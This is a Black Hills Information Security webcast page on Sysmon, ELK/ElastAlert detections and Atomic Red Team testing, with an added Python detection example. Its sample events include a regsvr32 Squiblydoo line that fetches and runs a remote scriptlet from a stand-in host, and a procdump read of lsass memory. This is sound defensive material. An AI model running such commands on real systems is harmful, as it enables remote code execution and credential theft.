Webcast: Let’s Talk About ELK Baby, Let’s Talk About You and AD

BHIS’ Defensery Driven Duo Delivers Another Delectable Transmission!

We know you are worried about your networks. After hours of discussion, we’ve come to the realization that some of our dedicated followers seem to be much more interested in catching malware than learning how to be (please forgive this next statement) “l33t hax0rs.”

Slides for this webcast can be found here: https://www.blackhillsinfosec.com/wp-content/uploads/2020/09/SLIDES_LetsTalkAboutELKBaby.pdf

2:47 – Why Are We Doing This?

5:07 – AT7: The Logs You Are Looking For

7:41 – AD Best Practices to Frustrate Attackers

9:37 – AT 5 – Complete Takedown & AT 6 – IOCs

12:04 – Blue Team-A-Palooza

14:22 – Windows Logging, Sysmon, and ELK – Part 1

16:45 – Implementing Sysmon and AppLocker

21:45 – …And Group Policies That Kill Kill-Chains

22:31 – Here Are Some Important Blogs

23:35 – Summary Complete

25:28 – Introducing the Atomic Red Team

27:50 – Installing the Atomic Framework

29:29 – Squiblydoo; The Results; Let’s Take A Step Back: The Atomic Tests; Another Step Back: WEF / Winlogbeat Config

33:41 – Executing T1015; Catching Executables; Executing T1003

42:02 – ElastAlert

43:21 – Now, On the ATT&CK

44:20 – Not Sure If That’s a Wrap Yet. (It’s Not)

47:11 – Check Out Our Dashboard

This webcast will demonstrate how our ongoing Windows baseline best-practices configuration ties in with improving your endpoint optics. But first, we will summarize some previous webcasts, their content, and the order in which they should be reviewed to tie all of these things together. Then, with all the baseline content and configuration options summarized, we will help you put a bow on it, just in time for the holidays.

The bright blue bow this year will help you set another New Year’s resolution:

  1. We all pledge to produce better and more effective logging that reduces time to detection.
  2. We can use open-source, well-documented solutions to do so!
  3. We can make the world a better place together!

With that said, we will be using an ELK (Elasticsearch, Logstash, Kibana) installation that includes ElastAlert, the open-source alerting framework written by the folks at Yelp. This installation will ingest our workstation logs (Windows event and Sysmon logs shipped via WEF and Winlogbeat) and demonstrate a base level of alerts that you too can quickly deploy in your environment. We may also have enough cycles to discuss the Security Onion project and how it has improved our overall network optics.

As a wrap-up, we will introduce the Atomic Red Team framework. If you haven’t seen or researched it before, it is a library of small, scripted tests mapped to MITRE ATT&CK techniques that you can run over and over to exercise and refine your workstation and server detections. Deployed alongside your logging infrastructure, it lets you confirm that a given technique actually produces the events your alerts key on, and fine-tune your alerting processes accordingly.
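To make the ELK/ElastAlert pipeline and the Atomic Red Team loop above concrete, here is an added example (not code from the webcast, BHIS, or the ElastAlert project): a small Python matcher that stands in for ElastAlert’s "any"-type rules and runs two detections over constructed Sysmon events in a Winlogbeat-like shape. The first catches the Squiblydoo pattern (regsvr32 loading scrobj.dll with a remote scriptlet, ATT&CK T1218.010); the second catches a non-allowlisted process opening lsass.exe with PROCESS_VM_READ (Sysmon event ID 10, the T1003 LSASS memory dumping case the webcast exercises). The field names, the allowlist of legitimate lsass readers, and the sample events are all assumptions made for the example; a real ElastAlert rule expresses the same logic as a YAML filter against the winlogbeat-* index.

```python
"""Toy ElastAlert-style rule matcher over constructed Sysmon events.

Added example, not BHIS or ElastAlert code. Field layout (winlog.event_id,
winlog.event_data.*, process.*) is assumed to resemble Winlogbeat output.
"""

# Constructed sample events: two Sysmon EID 1 (process create) and two EID 10
# (process access). Hostnames, paths and URLs are made up for the example.
SAMPLE_EVENTS = [
    {   # benign: regsvr32 registering a local DLL
        "winlog": {"event_id": 1, "channel": "Microsoft-Windows-Sysmon/Operational"},
        "process": {"name": "regsvr32.exe",
                    "command_line": "regsvr32.exe /s C:\\Windows\\System32\\msxml3.dll"},
        "host": {"name": "WS01"},
    },
    {   # Squiblydoo: regsvr32 fetching a scriptlet and running it through scrobj.dll
        "winlog": {"event_id": 1, "channel": "Microsoft-Windows-Sysmon/Operational"},
        "process": {"name": "regsvr32.exe",
                    "command_line": "regsvr32.exe /s /u /i:https://example.invalid/p.sct scrobj.dll"},
        "host": {"name": "WS01"},
    },
    {   # T1003-style: a dumping tool opens lsass.exe with full access
        "winlog": {"event_id": 10, "event_data": {
            "SourceImage": "C:\\Temp\\procdump64.exe",
            "TargetImage": "C:\\Windows\\System32\\lsass.exe",
            "GrantedAccess": "0x1FFFFF"}},
        "host": {"name": "WS01"},
    },
    {   # benign: svchost querying lsass with limited-information access only
        "winlog": {"event_id": 10, "event_data": {
            "SourceImage": "C:\\Windows\\System32\\svchost.exe",
            "TargetImage": "C:\\Windows\\System32\\lsass.exe",
            "GrantedAccess": "0x1000"}},
        "host": {"name": "WS01"},
    },
]


def get(event, path, default=None):
    """Walk a dotted path such as 'winlog.event_data.GrantedAccess' through nested dicts."""
    cur = event
    for key in path.split("."):
        if not isinstance(cur, dict) or key not in cur:
            return default
        cur = cur[key]
    return cur


def is_squiblydoo(event):
    """Sysmon EID 1: regsvr32.exe invoked with /i:<scriptlet> and scrobj.dll."""
    if get(event, "winlog.event_id") != 1:
        return False
    name = (get(event, "process.name") or "").lower()
    cmd = (get(event, "process.command_line") or "").lower()
    return name == "regsvr32.exe" and "scrobj.dll" in cmd and "/i:" in cmd


PROCESS_VM_READ = 0x0010  # access right needed to read lsass memory

# Assumed tuning list: system processes that legitimately open lsass.exe.
LSASS_READERS_ALLOWED = {
    "c:\\windows\\system32\\csrss.exe",
    "c:\\windows\\system32\\wininit.exe",
    "c:\\windows\\system32\\svchost.exe",
}


def is_lsass_read(event):
    """Sysmon EID 10: non-allowlisted process opens lsass.exe with PROCESS_VM_READ set."""
    if get(event, "winlog.event_id") != 10:
        return False
    target = (get(event, "winlog.event_data.TargetImage") or "").lower()
    if not target.endswith("\\lsass.exe"):
        return False
    source = (get(event, "winlog.event_data.SourceImage") or "").lower()
    try:
        granted = int(get(event, "winlog.event_data.GrantedAccess") or "0x0", 16)
    except ValueError:
        return False  # malformed access mask: do not alert on garbage
    return bool(granted & PROCESS_VM_READ) and source not in LSASS_READERS_ALLOWED


# Each rule mirrors an ElastAlert "any" rule: name, ATT&CK mapping, match predicate.
RULES = [
    {"name": "Squiblydoo regsvr32 scrobj.dll", "technique": "T1218.010", "match": is_squiblydoo},
    {"name": "LSASS memory read", "technique": "T1003.001", "match": is_lsass_read},
]


def run_rules(events, rules=RULES):
    """Evaluate every rule against every event; return one alert dict per match."""
    alerts = []
    for ev in events:
        for rule in rules:
            if rule["match"](ev):
                alerts.append({"rule": rule["name"], "technique": rule["technique"],
                               "host": get(ev, "host.name"),
                               "event_id": get(ev, "winlog.event_id")})
    return alerts


if __name__ == "__main__":
    for alert in run_rules(SAMPLE_EVENTS):
        print(alert)
```

Run against the four constructed events, only the Squiblydoo command line and the procdump access to lsass raise alerts; the local DLL registration and the svchost query do not. The point of pairing this with Atomic Red Team is that the T1003 and regsvr32 atomics generate exactly these kinds of Sysmon events on a real workstation, so you can verify the rule fires before you rely on it, and tune the allowlist when it fires on something legitimate.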

Want to learn more mad skills from the people who wrote this blog?

Check out these classes from Kent and Jordan:

Applied Purple Teaming

Defending the Enterprise

Available live/virtual and on-demand!